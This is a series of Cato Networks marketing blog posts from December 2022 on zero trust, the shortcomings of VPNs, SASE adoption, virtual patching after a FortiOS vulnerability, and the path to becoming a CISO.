Trusted Outsiders: Castle-and-moat security assumes that everyone inside the perimeter is trusted, while outsiders are untrusted. However, the growth of remote work means that companies need to find ways to account for trusted users outside of the perimeter, forcing the use of insecure and unscalable VPNs.
The zero trust security model was designed to address the limitations of these legacy security models. Under the zero trust model, all access requests are evaluated independently against least privilege access controls. If a user successfully authenticates, their session is monitored for suspicious or risky activity, enabling potential threats to be shut down early.
94% of companies are in the process of implementing zero trust, making it one of the most common cybersecurity initiatives. Some of the drivers of zero-trust include:
Corporate Security: Data breaches and ransomware infections are common, and, in many cases, are enabled by the remote access solutions (VPNs, RDP, etc.) used to implement perimeter-based security. Zero trust promises to reduce the probability and impact of these security incidents, decreasing enterprise security risk.
Regulatory Compliance: The zero trust security model aligns well with regulators’ goals to protect sensitive information. Implementing zero trust is best practice for compliance now and may be mandatory in future updates of regulations.
Incident Investigation: A zero trust security system tracks all access requests on the corporate network. This audit trail is invaluable when investigating a security incident or demonstrating regulatory compliance.
Greater Visibility: Zero trust’s stronger access control provides granular visibility into access requests. In addition to security applications, this data can also provide insight into how corporate IT assets are being used and inform infrastructure design and investment.
Zero trust overcomes the problems of legacy, perimeter-focused security models. As corporate IT environments expand, cyber threats mature, and regulatory requirements become stricter, it will be a vital part of a mature security policy.
[boxlink link="https://www.catonetworks.com/resources/why-remote-access-should-be-a-collaboration-between-network-security/?utm_medium=blog_top_cta&utm_campaign=remote_access_whitepaper"] Why remote access should be a collaboration between network & security | White Paper [/boxlink]
A VPN Can’t Provide Zero Trust
The rise of remote and hybrid work has made secure remote access a vital capability for many organizations. VPNs are a well-established remote access solution, and many organizations turned to them to support their remote employees.
However, while VPNs offer employees secure remote access to the corporate network, they fail to provide crucial capabilities for a zero trust deployment. Some of the ways in which VPNs fall short include:
Access Management: VPNs are designed to provide an authenticated user with full access to the corporate network, simply creating an encrypted tunnel from the user’s machine to the VPN endpoint. Without built-in access controls, VPNs cannot enforce zero trust’s least privilege access policies.
Integrated Security: VPNs have no built-in security capabilities, meaning that traffic must be routed through a full security stack en route to its destination. With corporate assets scattered on-prem and in the cloud, this usually results in traffic being routed to a central location for inspection, increasing network latency.
Optimized Routing: VPNs are point-to-point solutions, which limit the routes that traffic can take and can cause significant latency due to suboptimal routing. This may cause security controls to be bypassed or disabled in favor of improved network performance.
Two of the foundational concepts of zero trust security are access control and monitoring for security issues during an authenticated user’s session. VPNs provide neither of these key capabilities, and their performance and scalability limitations mean that users may attempt to evade or bypass defenses to improve performance and productivity. While zero trust is rapidly becoming essential for corporate cybersecurity, VPNs are ill-suited to implementing a zero trust architecture.
Achieving Zero Trust with SSE and SASE
These two essential capabilities of zero trust — access control and session security monitoring — are the reason why Security Service Edge (SSE) and Secure Access Service Edge (SASE) are ideal for implementing a corporate zero trust program. SASE solutions include zero trust network access (ZTNA) functionality, which provides the ability to enforce least privilege access controls across the corporate WAN.
Alongside ZTNA, SSE and SASE solutions also offer a range of key security functions, including Firewall as a Service (FWaaS), an intrusion prevention system (IPS), a secure web gateway (SWG), and a cloud access security broker (CASB). Converging security functions with access control makes SASE an all-in-one solution for zero trust.
SASE’s design can also eliminate the network performance impacts of security. Deployed as a cloud-native solution on a global network of points of presence (PoPs), SASE can inspect traffic at the nearest PoP before optimally routing it to its destination. Cloud-native design ensures that converged security has the resources required to perform vital security functions without incurring latency.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud can support your organization’s zero trust security goals by signing up for a free demo today.
Secure remote access is a common need for the modern enterprise. While employees almost exclusively worked from the office in the past, this has changed...
4 Ways Where Remote Access VPNs Fall Short Secure remote access is a common need for the modern enterprise. While employees almost exclusively worked from the office in the past, this has changed in recent years. The pandemic and the globalization of the workforce means that organizations may have users connecting and working from all over the world, and these remote users need secure remote access to corporate networks and other resources.
Historically, virtual private networks (VPNs) were the only available solution, and this familiarity has driven many organizations to expand their existing VPN infrastructure as the need for secure remote access has grown. However, VPNs are network solutions that were designed for corporate networks and security models that no longer exist, and cannot provide secure, high-performance network access to a workforce that requires a more modern remote access solution.
Let’s take a closer look at how remote access VPNs fall short:
1. Lack of built-in security/access management
VPNs are designed to provide secure remote access to corporate networks or IT resources. This includes creating an encrypted VPN tunnel between two endpoints — such as a remote employee’s computer and a VPN server on the corporate network — for business traffic to travel over.
While VPNs can protect against eavesdroppers, that’s about all that they can do. They include no built-in access management or security controls beyond requiring a username and password at logon. Protecting the corporate network against any threats that come over the VPN connection — such as those from an infected computer or a compromised user account — or implementing a zero-trust security policy requires additional security solutions deployed behind the VPN endpoint.
2. Geographic constraints
VPNs are designed to connect two points with an encrypted tunnel that network traffic can flow over. Securing corporate network traffic along its entire route requires VPN connections along each leg of that route. Corporate IT environments are becoming more distributed with the growth of cloud computing, remote sites, Internet of Things (IoT) devices, and business use of mobile devices. Securing access to all of the corporate WAN often creates tradeoffs between network performance and security.
VPNs’ lack of built-in security means that security solutions must be deployed behind each VPN server, making it more difficult to directly link every potential traffic source and destination. Instead, many organizations backhaul traffic to the headquarters network for inspection, degrading performance and increasing latency.
[boxlink link="https://www.catonetworks.com/resources/why-remote-access-should-be-a-collaboration-between-network-security/?utm_medium=blog_top_cta&utm_campaign=remote_access_whitepaper"] Why remote access should be a collaboration between network & security | White Paper [/boxlink]
3. Inefficient routing
The point-to-point nature of VPN connections means that a VPN connection can only provide secure access to a single location. For example, a user may be able to connect directly and securely to the corporate WAN.
However, corporate networks are increasingly distributed with infrastructure in on-prem data centers and scattered across multi-cloud environments. As a result, VPNs either force users to have VPNs configured for multiple different locations or to accept inefficient network routing that passes through a single VPN terminus en route to their intended destination.
4. Excessive trust in endpoint security
The goal of a VPN is to protect remote users’ network traffic from being intercepted or eavesdropped upon en route to its destination. VPNs don’t inspect the traffic that they carry or perform any access control beyond basic user authentication. As a result, VPNs are overly trusting in the security of the endpoints that they connect.
Some of the threats that VPNs provide no protection against include:
Infected Devices: If a remote employee’s device is compromised with malware, the malware can send traffic over the device’s VPN connection as well. This could allow an attacker to bypass security restrictions and gain access to corporate networks.
BYOD Devices: The rise of remote work has resulted in increased use of personally owned devices for business purposes. These devices can connect to corporate IT assets via VPNs and may be infected with malware or non-compliant with corporate security policies.
Compromised Accounts: VPNs only implement access control in the form of user authentication when setting up a VPN session. If an attacker has compromised a user’s authentication credentials (password, etc.), they can log in as that user and connect to corporate IT assets.
VPNs only secure the connection over which two endpoints are communicating. They’re overly trusting of the endpoints involved in the communication, which can result in malware infections or other threats to corporate assets.
Building Secure Remote Access for the Modern Enterprise
VPNs have significant limitations in terms of their performance, usability, and security. While these issues may have been manageable in the past, rapidly evolving corporate networks make them an increasingly unsuitable solution for secure remote access. Relying on legacy remote access VPNs forces companies to make choices between network performance and security.
Organizations looking to modernize their IT infrastructure to better support remote and hybrid work schedules need to replace their VPNs. Secure Access Service Edge (SASE) provides the capabilities that they need, eliminating the limitations of VPNs and providing numerous additional benefits.
With SASE, companies can move security to the network edge, enabling network optimization without sacrificing security. To learn more about how a cutting-edge SASE solution can enhance an organization’s remote access infrastructure, sign up for a free demo of Cato SASE Cloud, the world’s first global SASE platform, today.
Making the Paradigm Shift A paradigm shift away from traditional network and security architectures towards a more flexible and highly scalable cloud-native SASE Cloud architecture...
December 28, 2022
A CxO’s Guide: Tough Questions to Ask When Moving to SASE Making the Paradigm Shift
A paradigm shift away from traditional network and security architectures towards a more flexible and highly scalable cloud-native SASE Cloud architecture can be stomach-churning for many CxOs today. However, taking a holistic view of the drivers of this shift will help put things into perspective. Realizing desired outcomes like the reallocation of resources to more strategic initiatives, agility, speed, and scalability can bring about child-like anticipation of how this new world of SASE will feel.
Before CxOs achieve technology nirvana, however, they must take a few logical steps, and asking tough questions to understand the problem statements and desired outcomes is an important part of this. To better frame this picture, we’ve discussed this with a few of our customers to understand their thought processes during their SASE journey.
Define The Problem Statement
Organizations arrive at SASE decisions from different vectors. For some, it’s as easy as upgrading their WAN connectivity and adding better security. For others, it is exploiting a refresh cycle to explore “what’s next”. Whatever the drivers, understanding the true problems is essential for proper outcomes.
A simple problem statement might be, “Our network is a mess, so we need a different approach to this refresh cycle. Do we have the talent to pull it off?” This identifies two problems to solve: network performance and reliability, and the skillset deficit. Another problem statement might be, “Our current tools are too expensive to maintain, and we need more value for the money we spend.” This implies that managing network and security tools, equals more time spent on mundane support tasks than strategic projects.
While these statements are rather generic, they are no less real-world for most CxOs. Identifying the true problem statement can be exhaustive; however, this is the first step toward understanding the right questions to ask.
“The steep learning curve on our firewalls meant we were not getting value on the high costs we were paying. We needed a simpler, well-designed solution that our teams could more easily learn and manage.”
~ Joel Lee, CIO @ an Asia-Based Construction Firm
Ask The Tough Questions
Determining which questions are relevant enough to influence a buying decision and asking them can also be exhausting. Not all tough questions are relevant questions, and vice versa. Additionally, all questions must derive from the problem statements specific to your business situation. The following were the top questions our CxOs tend to ask:
1. Does this fit our use cases, and what do we need to validate?
“What problems are we trying to solve, and how should we approach this?” By asking this question of their teams, CxOs are basically asking what is not working, why it’s not working, and what success looks like when it is working. On the surface, it seems easy to answer; however, when digging deeper, many organizations find this to be a daunting question because the answer is sometimes a moving target and is almost always subjective.
2. Do we have the right skills?
When moving to a 100% cloud-delivered SASE solution, it is logical to question the level of cloud expertise required. However, a major relief for CxOs is realizing that their teams could easily be trained for a SASE Cloud solution. Additionally, they realize their teams have more time to expand other technical skills that benefit the broader organization. This allowed them to re-frame the question to, “what additional skills can we learn to build a more agile and dynamic IT organization?”
3. SD-WAN makes sense, but SASE? How will all security services be delivered without an on-prem device? What are the penalties/risks if done solely in the cloud?
Traditional appliances fit nicely inside the IT happy place – an on-prem appliance with all configurations close by. So, can we really move all policy enforcement to the cloud? Can a single security policy really give us in-depth threat protection? These questions try to make sense of SASE, highlighted by a fear of the architectural unknown. However, existing complexity is why these CxOs wanted to inject sanity and simplification into their operations. Security-as-a-Service delivered as part of a SASE Cloud made sense for them, knowing they get the right amount of security when needed.
4. What will the deployment journey be like, and how simple will it be?
Traditional infrastructure deployments require appliances everywhere, months and months of deployment and troubleshooting, multiple configurations, and various other risks that may not align with business objectives. This is a common mindset when pursuing SASE, and CxOs want to understand the overall logistics – “Will our network routing be the same? Will our current network settings be obsolete? Where will security sit? How will segmentation work? Is it compatible with my clouds, and how will they connect? Who supports this and how?” This is just a tiny subset of items to understand, intending to set proper expectations.
5. What are the quantitative and qualitative compromises?
CxOs need to understand how to prioritize and find compromises where needed. Traditional costs often exceed the monetary value and can veer into architecture and resource value. So, an effective approach proposed was using the 80/20 rule on compromises – what are my must-have, should-have, and could-have items or features? Answering this begins with knowing where the 80/20 split is. For example, if the solution solves 80% of your problems and leaves 20% unsolved, what is the must-have, should-have, and could-have of the remaining 20%?
How do you determine which is which?
How would you solve the must-haves differently inside the same architecture?
How will you adapt if an architectural could-have unexpectedly evolves into a must-have?
6. How do we get buy-in from the board?
SASE is just as much a strategic conversation as it is an architectural one. How a CxO approaches this – what technical and business use cases they map to, and their risk-mitigation strategy – will determine their overall level of success. So, gaining board-level buy-in was a critical part of their process. There were various resources that helped with these conversations, including ROI models. CxOs can also consult our blog, Talk SASE To Your Board, as another valuable resource that may assist in these conversations.
“What does this convergence look like, and how do we align architecturally to this new model?”
~ Head of IT Infrastructure @ a Global Financial Services Firm
Mitigate Internal Resistance
Any new project that requires a major paradigm shift will generate resistance from business and IT teams. Surprisingly, our panel experienced very little resistance when presenting SASE to their teams. Each anticipated potential resistance to budgets, architecture change, resource allocations, etc. They determined what could and could not be done within those constraints and addressed them far in advance. This helped mitigate any potential resistance and allowed them to ease all concerns about their decision.
[boxlink link="https://www.catonetworks.com/news/cato-has-been-recognized-as-representative-vendor-in-2022-gartner-market-guide-for-single-vendor-sase/?utm_medium=blog_top_cta&utm_campaign=gartner_market_guide_news"] Cato Networks Has Been Recognized as a Representative Vendor in the 2022 Gartner® Market Guide for Single-Vendor SASE | Read now [/boxlink]
What Other CxOs Can Learn
Transitioning to SASE requires time and planning, like any other architecture project. Keys to making this successful include understanding your problem statement, identifying your outcomes, and learning from your peers. This last point is key because SASE projects, while relatively new, are becoming more mainstream, and the following advice should make any SASE journey much smoother.
Planning Your Project
Have a clear vision and seek upfront input from business and technical teams
Have a clear understanding of your “as-is” and “to-be” architecture
Don’t jump on the bandwagon – know your requirements and desired outcomes
Conduct Thorough Research
Do a detailed analysis of the problem, then do your market research
Understand Gartner’s hype cycle, roadmaps, predictions, etc.
Never stop researching solutions until your goals are finalized
You may discover something you needed that you did not realize - extended value
Evaluate The Solution and Vendor
Develop a scoring mechanism to evaluate vendor technology and performance
Understand your compliance requirements (NIST, PCI-DSS, ISO, GDPR, etc.) and how the solution will enable this
Examine their approach to delivering your outcomes, and pay attention to onboarding, training, and ongoing support
Be Confident in Your Decision
Don’t focus solely on costs
Examine the true value of the solution
Understand the extended costs of each solution – SLAs, ongoing maintenance, patching, fixing, scalability, refresh cycles, etc.
Be honest with yourself and your vendor and remain focused on your outcomes.
This approach benefitted our CxOs and guided them toward the Cato SASE Cloud solution.
“Know what you want to achieve upfront, then stay focused but flexible. Pay attention to skills and capacity requirements.”
~ Stuart Hebron, Group CIO, Tes
Make the SASE Decision
SASE is the ultimate business and technology transformation, and embarking upon this journey is an important step that every decision-maker will, understandably, have questions about. Are we compromising on anything? What risks might we face? Do we have the right skill set internally? Is it financially feasible? These are just a few of the key questions CxOs will pose when pursuing SASE. Asking them will provoke critical thinking and more holistic planning that includes all elements of IT and the broader organization. In the end, asking these questions will lead you to the obvious conclusion – a digital transformation platform like the Cato SASE Cloud solution is the best approach to prepare you for continuous business transformation without limitations.
For more advice on deciding which solution is right for your organization, please read this article on evaluating SASE capabilities.
Technological innovation, an evolving threat landscape, and other factors mean that the security needs of tomorrow may be very different from those of yesterday. However,...
December 27, 2022
Designing the Corporate WAN for the Security Needs of Tomorrow Technological innovation, an evolving threat landscape, and other factors mean that the security needs of tomorrow may be very different from those of yesterday. However, many organizations are still reliant on security models and solutions designed for IT architectures that are rapidly becoming extinct. Keeping pace with digital transformation and protecting against cyber threats requires a new approach to security and security architecture capable of supporting it.
Cybersecurity is Only Going to Get More Complicated
In many organizations, security teams are understaffed and overwhelmed by their current responsibilities. However, the challenge of securing organizations against cyber threats will only grow more difficult and complex. Some of the main contributors to these challenges include:
Evolving Networks: Corporate networks have grown and evolved rapidly in recent years with the adoption of cloud computing, remote work, and Internet of Things (IoT) and mobile devices. As technology continues to evolve, corporate IT networks will continue to grow larger and more diverse, making them more difficult to monitor, manage, and secure.
Sophisticated Threats: The cyber threat landscape is changing rapidly as demonstrated by the evolution of the ransomware threat and the emergence of a cybercrime service economy. Security teams must develop and deploy defenses against the latest attacks faster than attackers can circumvent them.
Regulatory Requirements: The enactment of the EU’s GDPR kicked off a wave of new data privacy laws, complicating the regulatory landscape. As laws are created and updated, security teams must take action to demonstrate that they are in compliance with the latest requirements.
Complex Policies: Changes in corporate networks, work models, and cyber threats drive the evolution of more complex corporate IT policies. For example, the introduction of bring your own device (BYOD) policies makes it necessary for security teams to enforce these policies and ensure that devices not owned by the company do not place it at risk.
Security teams can’t scale to keep up with their growing responsibilities, especially since a cyber skills gap means that many are already understaffed. Protecting the growing enterprise from the security threats of tomorrow requires a more manageable and maintainable security strategy.
[boxlink link="https://catonetworks.easywebinar.live/registration-101?utm_medium=blog_top_cta&utm_campaign=future_of_security_webinar"] The Future of Security: Do All Roads Lead to SASE? | Webinar [/boxlink]
Zero Trust Is a Core Pillar for Balancing Business and Security Needs
A corporate security policy should complement, not conflict with an organization’s business needs. Corporate security programs should be designed to support business processes and goals such as:
Remote Access: Employees need remote access to corporate resources, but the company needs to ensure that this remote access does not create additional risk to the organization. Corporate security programs should provide secure, high-performance remote access to corporate resources.
Access Management: Access management is essential to managing corporate security risk and maintaining regulatory compliance. Access control policies should allow legitimate users efficient access to corporate resources while preventing unauthorized access.
Compliance: Companies must be able to achieve and demonstrate compliance with a growing array of regulations. This includes global network visibility and security controls that meet regulatory requirements.
A zero trust security architecture provides a logical balance between security and business needs. With zero trust, access is granted to corporate assets on a case-by-case basis with decisions made based on least privilege access principles. This ensures that legitimate users have the access needed to do their jobs while minimizing the impact of compromised accounts and other intrusions. Additionally, authenticated users’ sessions should be monitored and terminated if risky or malicious activity is detected.
However, a zero trust security strategy is only useful if it can be enforced consistently across an organization’s entire corporate WAN without compromising network performance. Traditional, perimeter-focused security strategies — depending on virtual private networks (VPNs) and security appliances — force choices between network performance and security.
Zero Trust Security Requires a Strong, Stable Foundation
The effectiveness of a zero trust architecture depends on the solutions that it is built on. Zero trust must consistently apply access controls and security policies across the entire corporate WAN. If a weak point exists in an organization’s defenses, an attacker can use it as an entry point to gain access to corporate resources.
Implementing consistent security protections across the enterprise can be a significant challenge. The modern corporate WAN is composed of a variety of environments, including on-prem and cloud-based deployments, as well as IoT and mobile devices alongside traditional computers. These varying environments and endpoints affect the security solutions that can be deployed, which can result in a security architecture that suffers from visibility and enforcement gaps and complex management and maintenance.
However, while endpoints may differ across the corporate WAN, the network is mostly consistent regardless of environment. Deploying access management and security controls at the network level makes consistent enforcement of zero trust access controls and security policies possible.
Security Service Edge (SSE) and Secure Access Service Edge (SASE) provide an ideal foundation for a zero trust architecture. They converge zero trust network access (ZTNA) — which offers the access management that zero trust requires — with the tools needed to secure legitimate users’ sessions, including Firewall as a Service (FWaaS), an intrusion prevention system (IPS), a secure web gateway (SWG), and a cloud access security broker (CASB). In SASE solutions, these security functions are combined with built-in network optimization technologies to apply zero trust access controls and enterprise-grade security protection before routing traffic on to where it needs to go.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud can help your organization to build a zero trust architecture that grows with the organization by signing up for a free demo today.
While zero trust promises reduced exposure to security incidents and data breaches, as well as simplified compliance with regulatory requirements, deploying a zero trust architecture...
December 22, 2022
A True Zero Trust Architecture Requires Security Integration While zero trust promises reduced exposure to security incidents and data breaches, as well as simplified compliance with regulatory requirements, deploying a zero trust architecture is not as simple as implementing least privilege access controls and replacing legacy virtual private networks (VPNs) with zero trust network access (ZTNA). Effective zero trust security acknowledges that strict access controls will not block all threats and takes steps to manage the security risks of authenticated users.
An integrated security architecture that goes beyond ZTNA is essential for effective zero trust security.
Zero Trust is About More Than Access Controls
Zero trust is a model intended to address the security risks associated with the legacy, perimeter-focused security model. Under this model, insiders — connected directly or via a VPN — are granted unrestricted access to corporate networks, systems, and applications.
Due to the limitations of VPNs, the focus of zero trust discussions is often on controlling users’ access to corporate resources. By strongly authenticating users and implementing the principle of least privilege and granting users only the access and permissions that are required for their roles, access management can significantly decrease an organization’s security risks.
However, strong user authentication and access control are not enough for zero trust. While zero trust can ensure that only legitimate, authenticated users have access to corporate resources, these users can still pose a threat due to malice, negligence, or compromised devices. Additionally, attackers may target an organization through attack vectors not associated with user accounts, such as exploiting a vulnerable web application. Effective zero trust architectures must have controls in place to address the threats not mitigated by strong access control.
Microsegmentation Limits Corporate Security Risks
Network segmentation is not a new concept. The legacy castle-and-moat security model is designed to segment an organization’s internal, private network from the public Internet. By forcing all traffic crossing this border to flow through network firewalls and other security solutions, organizations prevent some threats from ever reaching their systems.
Microsegmentation is designed to manage the potential damage caused by threats that manage to bypass perimeter-based defenses and gain access to an organization’s internal network. By breaking the enterprise network into multiple small networks, microsegmentation makes it more difficult for a threat to move laterally through an organization’s systems.
The primary goal of zero trust security is to limit the probability and impact of security incidents, but these breaches will still happen. Microsegmentation reduces the impact of these breaches by limiting the systems, applications, and data that an attacker can access without crossing additional security boundaries and subjecting their actions to further inspection.
Microsegmentation Needs More Than Just ZTNA
For many organizations, ZTNA is the cornerstone of their zero trust security strategy. By replacing legacy, insecure VPNs with ZTNA, an organization gains the ability to enforce least-privilege access controls and dramatically reduce the probability and impact of cybersecurity incidents.
However, while ZTNA is an invaluable solution for zero trust security, it’s not enough on its own. ZTNA provides the access controls needed for zero trust, but additional solutions are needed to implement microsegmentation effectively. In addition to ZTNA’s access controls, companies also need to be able to inspect network traffic and block potential threats from crossing network boundaries.
True zero trust security requires multiple solutions, not only ZTNA but also a network firewall and advanced threat prevention capabilities. Ideally, these solutions should be integrated together into a single solution, providing an organization with comprehensive security visibility and management without the complexity and network performance impacts of a sprawl of disparate standalone security solutions.
[boxlink link="https://catonetworks.easywebinar.live/registration-85?utm_medium=blog_top_cta&utm_campaign=using_sase_for_ztna_webinar"] Using SASE For ZTNA: The Future of Post-Covid 19 IT Architecture | Webinar [/boxlink]
SSE and SASE Enable Effective Zero Trust Security
Security Service Edge (SSE) and Secure Access Service Edge (SASE) are the ideal solution for implementing a corporate zero trust program.
SSE and SASE converge ZTNA, Firewall as a Service (FWaaS), and Advanced Threat Prevention capabilities — including an Intrusion Prevention System (IPS) and Next-Generation Anti-Malware (NGAM) within a single solution. Additionally, as a cloud-native security platform, SSE or SASE can be deployed near an organization’s users and devices, minimizing network performance impacts while providing consistent security visibility and policy enforcement across the corporate WAN.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about implementing an effective zero trust security program with Cato SASE Cloud by signing up for a free demo today.
A new vulnerability underscores the need for virtual patching. The vulnerability, found in FortiOS, would allow a Remote Code Execution (RCE) attack on multiple firewall...
December 20, 2022
New Critical Vulnerability Underscores the Need for Virtual Patching A new vulnerability underscores the need for virtual patching. The vulnerability, found in FortiOS, would allow a Remote Code Execution (RCE) attack on multiple firewall products as well as FortiGate SSL VPN. The vulnerability has reportedly already been exploited by threat actors. Fortinet has issued a patch for this vulnerability.
The vulnerability, which was initially reported on December 9th, received a score of 9.3 (Critical) and Fortinet has confirmed at least one instance of it being exploited.
Any vulnerability in a system is a potential entry point for a threat actor and must be immediately patched, especially critical vulnerabilities like this one. Threat actors have been known to quickly utilize such vulnerabilities and exploit unpatched systems, while in many cases systems remain unpatched for a very long time giving even the slower-paced adversaries opportunities to exploit them. Vulnerabilities such as Log4j, which coincidently is “celebrating” its one-year birthday, are still being used by different adversaries to target unpatched systems to gain access into networks. Why? Because patching is so hard.
[boxlink link="https://www.catonetworks.com/rapid-cve-mitigation/?utm_medium=blog_top_cta&utm_campaign=rapid_cve_mitigation"] Rapid CVE Mitigation | Cato Security Research [/boxlink]
The Need for Virtual Patching
Having to identify, connect (or physically go to), patch, and test multiple boxes in multiple locations every time a new vulnerability is discovered is no small feat. Organizations need to perform this process very quickly whenever a new vulnerability is discovered as threat actors move quickly on such opportunities.
In addition, adversaries do not shy away from utilizing old vulnerabilities that still work. Log4j is one example but not the only. CISA addressed this in their “Top Routinely Exploited Vulnerabilities” alert, writing, “CISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries’ use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known.“
The solution to this problem is a cloud-based security architecture that allows for virtual patching. Virtual patching is defined by OWASP as “A security policy enforcement layer which prevents the exploitation of a known vulnerability. The virtual patch works since the security enforcement layer analyzes transactions and intercepts attacks in transit, so malicious traffic never reaches the web application. The resulting impact of a virtual patch is that, while the actual source code of the application itself has not been modified, the exploitation attempt does not succeed.”
Only a cloud-based security solution eliminates the need to patch box-by-box and effectively enables a “mitigate-once-protect-everywhere" patching strategy.
SASE (Secure Access Service Edge) is an enterprise networking and security service that converges SD-WAN with multiple security functions – including FWaaS, CASB, DLP, SWG,...
December 15, 2022
An Inside Look at Life Before and After Deploying SASE SASE (Secure Access Service Edge) is an enterprise networking and security service that converges SD-WAN with multiple security functions - including FWaaS, CASB, DLP, SWG, and ZTNA - into a converged, cloud-native service that is manageable, optimized, secure and easy to use.But what does life after SASE really look like when implemented in an enterprise? To find out, we interviewed Ben De Laat, Head of IT Security at BrandLoyalty, who implemented Cato’s SASE Cloud, together with trusted Cato Partner and IPknowledge’s Managing Director, Steven de Graaf, who assisted with the implementation. This blog post is an abridged version of their insights. For a more detailed account of their experiences, you can read the full eBook, here: “Life after deploying SASE”.
SASE Migration Use Cases
First, let’s start our SASE journey by understanding when is the best time to transition to SASE? It’s strongly recommended to consider a migration to SASE when:
MPLS contracts are up for renewal and can be replaced with a more secure and higher performing alternative at a lower cost.
Employees are working at multiple global locations and require a secure and frictionless solution.
IT is managing complex networking environments and need a simple-to-use, high-performing and secure substitute.
The workforce is employed remotely or in a hybrid manner and needs a scalable and secure solution to connect all employees, but without backhauling and based on least-privileged access.
Your SASE Migration Plan
The operational migration to SASE is quick and efficient, sometimes requiring only weeks from start to finish! To accommodate and complement this quick shift, it is recommended to prepare a well thought out plan that can help evangelize the transition internally, monitor it and track success. We recommend such a migration plan include:
The strategic business value - How SASE will enable employees to focus on their core responsibilities, instead of them having to spend time and become frustrated when dealing with the effects of misconfigured firewalls or URL filters that are blocking valid websites.
The technological value - How SASE’s converged architecture and single software stack will eliminate IT and IS overhead and hassle, ensure optimized connectivity and provide an optimal security posture.
The financial value - How SASE will reduce the annual costs of networking and security, coupled with the value to the business.
[boxlink link="https://www.catonetworks.com/resources/inside-look-life-before-and-after-deploying-sase/?utm_medium=blog_top_cta&utm_campaign=before_and_after_sase"] An Inside Look: Life Before and After Deploying a SASE Service | Whitepaper [/boxlink]
Life After SASE: What’s New?
What can IT leaders, security professionals and business leaders expect once they’ve migrated to a SASE service? Here are six new SASE-driven organizational achievements that will make you throw your hands in the air and wonder why you didn’t migrate to SASE sooner.
Newfound Network VisibilitySASE’s convergence of end-to-end networking and security provides newfound visibility into the network. Rather than having network and security information split between discrete tools and services, IT has a single pane of glass with visibility into the entire network. All security and networking events are stored in a common database, mapped onto a single timeline. With one timeline for networking and security, IT can troubleshoot problems faster, spot anomalies quicker, and enable better operational monitoring.
An Optimal Security PostureSASE provides insights into which systems and services are being used by employees and third parties and their vulnerabilities. If necessary, this information can also help IT identify system replacements and eliminate shadow IT.
Better IT Services for the Business and for UsersSASE’s seamless, unified service displaces point solutions in a robust and reliable manner. This new architecture enables IT to monitor operational activity so they can optimize line provisioning. In addition, with SASE replacing the grunt work, IT teams have more time to work on strategic business initiatives.
Seamless Remote Work UnlockedSASE replaces high latency VPNs. Instead, traffic is routed over a global private backbone and monitored for threats. The result is high-performance and secure connectivity for all users, everywhere.
Optimized Connectivity and PerformanceSASE optimizes performance and the user experience by throughput maximization, providing increased and cost-effective bandwidth by routing traffic on a cloud-native, global, private backbone with multiple internet access links and active-active configurations.
Peace of MindWith SASE, both end-user and IT and IS can focus their efforts on fulflling business-critical initiatives. No more operational overhead, fretting over updates and lack of visibility into metrics and performance.Are you ready to get started with SASE? Read more about what the transition to SASE looks like in our new eBook “Life after deploying SASE”.
If you're a Security professional looking to become a CISO, then you've come to the right place. This five-step guide is your plan of action...
December 13, 2022
The 5-Step Action Plan to Becoming CISO The Path to Becoming CISO Isn't Always Linear
There isn’t one definitive path to becoming a CISO.
Don’t be discouraged if your career path isn’t listed above or isn’t “typical.” If your end goal is to become a CISO, then you’ve come to the right place. Keep reading for a comprehensive action plan which will guide you from your current role in IT, IS or Cybersecurity and on the path to becoming a world-class CISO.
Becoming a CISO is About Changing Your Focus
The Difference Between IS, IT or Cybersecurity Roles and a CISO Role: Tactical vs. Strategic
Making The Shift from Security Engineer to Future CISO
The most common mistake that security engineers make when looking to become CISO is focus. To be successful as a security engineer the focus is on problem hunting. As a top-tier security professional, you must be the best at identifying and fixing vulnerabilities others can’t see.
How to Think and Act Like a Future CISO
While security engineers identify problems, CISOs translate the problems that security engineers find into solutions for C-suite, the CEO and the board. To be successful in the CISO role, you must be able to transition from problem-solver to a solution-oriented mindset.
A common mistake when transitioning to CISO is by leading with what’s most familiar – and selling your technical competency. While understanding the tech is crucial when interfacing with the security team, it’s not the skillset you must leverage when speaking with C-suite and boards. C-suite and boards care about solutions – not problems. They must feel confident that you understand the business with complete clarity, can identify cyber solutions, and translate them in terms of business risks, profit and loss. To be successful in securing your new role, focus on leveraging cyber as a business enabler to help the business reach its targeted growth projections.
The Skillset Necessary to Become a CISO
Translate technical requirements into business requirements
Brief executives, VPS, C-level, investors and the board
Understand the business you’re in on a granular level(The company, its goals, competitors, yearly revenue generated, revenue projections, threats competitors are facing, etc.)
Excellent communication: Send effective emails and give impactful presentations
Balance the risk between functionality and security by running risk assessments
Focus on increasing revenue and profitability in the organization
Focus on a solution-oriented mindset, not an identification mindset
[boxlink link="https://www.catonetworks.com/resources/cato-sse-360-finally-sse-with-total-visibility-and-control/?utm_source=blog&utm_medium=top_cta&utm_campaign_sse360"] Cato SSE 360: Finally, SSE with Total Visibility and Control | Whitepaper [/boxlink]
Getting Clear on the CISO Role: So, What Does a CISO Actually Do?
Learn The CISO’s Role and Responsibilities (R&R)
The CISO is essentially a translator between the security engineering team and C-suite.
Set Yourself Up for Success in the Role: Measure What Matters
What you measure in your role will ultimately determine your career success. Too often CISOs set themselves up for failure by playing a zero-sum security game.
This means any security incident = CISO gets fired = No one wins
But successful CISOs know that cybersecurity is a delicate balancing act between ensuring security and functionality.
